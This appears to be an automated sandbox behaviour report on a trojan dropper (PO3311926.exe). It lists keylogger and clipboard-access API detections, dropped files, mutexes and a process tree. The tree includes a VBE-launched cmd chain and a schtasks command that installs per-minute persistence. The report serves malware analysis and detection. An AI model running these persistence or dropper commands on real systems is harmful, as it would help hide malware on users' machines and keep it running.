Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.8:49730 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0060F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 8_2_0060F45C
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0060F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_0060F6C7
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00ADF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 20_2_00ADF6C7
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0060F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 8_2_0060F45C
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005FA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 8_2_005FA54A
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00629ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 8_2_00629ED5
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AF9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 20_2_00AF9ED5

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BA6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00BA6FAA
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005F1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 8_2_005F1A91
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005FF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 8_2_005FF122
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00ACF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 20_2_00ACF122
Detected potential crypto function
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BA848E 0_2_00BA848E
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BB6CDC 0_2_00BB6CDC
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BB00B7 0_2_00BB00B7
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BB4088 0_2_00BB4088
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BA40FE 0_2_00BA40FE
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BC51C9 0_2_00BC51C9
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BB7153 0_2_00BB7153
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BA32F7 0_2_00BA32F7
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BB62CA 0_2_00BB62CA
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BB43BF 0_2_00BB43BF
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BAC426 0_2_00BAC426
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BAF461 0_2_00BAF461
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BCD440 0_2_00BCD440
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BB77EF 0_2_00BB77EF
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BCD8EE 0_2_00BCD8EE
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BA286B 0_2_00BA286B
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BAE9B7 0_2_00BAE9B7
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BD19F4 0_2_00BD19F4
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BB3E0B 0_2_00BB3E0B
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BC4F9A 0_2_00BC4F9A
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BAEFE2 0_2_00BAEFE2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B2007 8_2_005B2007
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B8037 8_2_005B8037
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005AE0BE 8_2_005AE0BE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0059E1A0 8_2_0059E1A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0059225D 8_2_0059225D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B22C2 8_2_005B22C2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005CA28E 8_2_005CA28E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005AC59E 8_2_005AC59E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0061C7A3 8_2_0061C7A3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005CE89F 8_2_005CE89F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0060291A 8_2_0060291A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005C6AFB 8_2_005C6AFB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005F8B27 8_2_005F8B27
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005BCE30 8_2_005BCE30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005C7169 8_2_005C7169
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_006251D2 8_2_006251D2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00599240 8_2_00599240
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00599499 8_2_00599499
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B1724 8_2_005B1724
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B1A96 8_2_005B1A96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00599B60 8_2_00599B60
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B7BAB 8_2_005B7BAB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B1D40 8_2_005B1D40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B7DDA 8_2_005B7DDA
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A7E0BE 20_2_00A7E0BE
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A88037 20_2_00A88037
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A82007 20_2_00A82007
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A6E1A0 20_2_00A6E1A0
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A9A28E 20_2_00A9A28E
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A822C2 20_2_00A822C2
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A6225D 20_2_00A6225D
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A7C59E 20_2_00A7C59E
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AEC7A3 20_2_00AEC7A3
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A9E89F 20_2_00A9E89F
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AD291A 20_2_00AD291A
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A96AFB 20_2_00A96AFB
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AC8B27 20_2_00AC8B27
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A8CE30 20_2_00A8CE30
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AF51D2 20_2_00AF51D2
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A97169 20_2_00A97169
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A69240 20_2_00A69240
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A69499 20_2_00A69499
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A81724 20_2_00A81724
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A81A96 20_2_00A81A96
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A87BAB 20_2_00A87BAB
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A69B60 20_2_00A69B60
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A87DDA 20_2_00A87DDA
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A81D40 20_2_00A81D40
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin 3FCE07BD7E220E97A1B141DA155444F95ABA7B5E4325F6A5EDB262C025C1E5A9
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe 3FCE07BD7E220E97A1B141DA155444F95ABA7B5E4325F6A5EDB262C025C1E5A9
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\PO3311926.exe Code function: String function: 00BBF5F0 appears 31 times
Source: C:\Users\user\Desktop\PO3311926.exe Code function: String function: 00BBEC50 appears 56 times
Source: C:\Users\user\Desktop\PO3311926.exe Code function: String function: 00BBEB78 appears 39 times
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: String function: 00A7FD60 appears 40 times
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: String function: 00A80DC0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: String function: 005B0DC0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: String function: 005AFD60 appears 40 times
Sample file is different than original file name gathered from version info
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs PO3311926.exe
Uses 32bit PE files
Source: PO3311926.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, Helper.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, Helper.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, Helper.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, Helper.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winEXE@56/58@2/4
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BA6C74 GetLastError,FormatMessageW, 0_2_00BA6C74
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005F194F AdjustTokenPrivileges,CloseHandle, 8_2_005F194F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005F1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 8_2_005F1F53
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AC194F AdjustTokenPrivileges,CloseHandle, 20_2_00AC194F
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AC1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 20_2_00AC1F53
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00605B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 8_2_00605B27
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005FDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification, 8_2_005FDC9C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00614089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 8_2_00614089
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BBA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00BBA6C2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin File created: C:\Users\user\wrse Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2840:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2512:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_03
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\bOVQxHmcqdPEzZOw
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1152:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2328:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_03
Source: C:\Users\user\Desktop\PO3311926.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0 Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Command line argument: sfxname 0_2_00BBDF1E
Source: C:\Users\user\Desktop\PO3311926.exe Command line argument: sfxstime 0_2_00BBDF1E
Source: C:\Users\user\Desktop\PO3311926.exe Command line argument: STARTDLG 0_2_00BBDF1E
Source: PO3311926.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PO3311926.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: PO3311926.exe ReversingLabs: Detection: 68%
Source: PO3311926.exe Virustotal: Detection: 55%
Source: C:\Users\user\Desktop\PO3311926.exe File read: C:\Users\user\Desktop\PO3311926.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PO3311926.exe "C:\Users\user\Desktop\PO3311926.exe"
Source: C:\Users\user\Desktop\PO3311926.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xl
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin sdadbtvsh.bin nngqrvwq.xl
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\RegSvcs.exe C:\Users\user\AppData\Roaming\RegSvcs.exe
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\wrse\sdadbtvsh.bin.exe "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\RegSvcs.exe "C:\Users\user\AppData\Roaming\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\RegSvcs.exe C:\Users\user\AppData\Roaming\RegSvcs.exe
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\wrse\sdadbtvsh.bin.exe "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\RegSvcs.exe "C:\Users\user\AppData\Roaming\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,7789945920983853701,11701749339926702711,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Users\user\wrse\sdadbtvsh.bin.exe "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\RegSvcs.exe C:\Users\user\AppData\Roaming\RegSvcs.exe
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO3311926.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xl Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin sdadbtvsh.bin nngqrvwq.xl Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew Jump to behavior
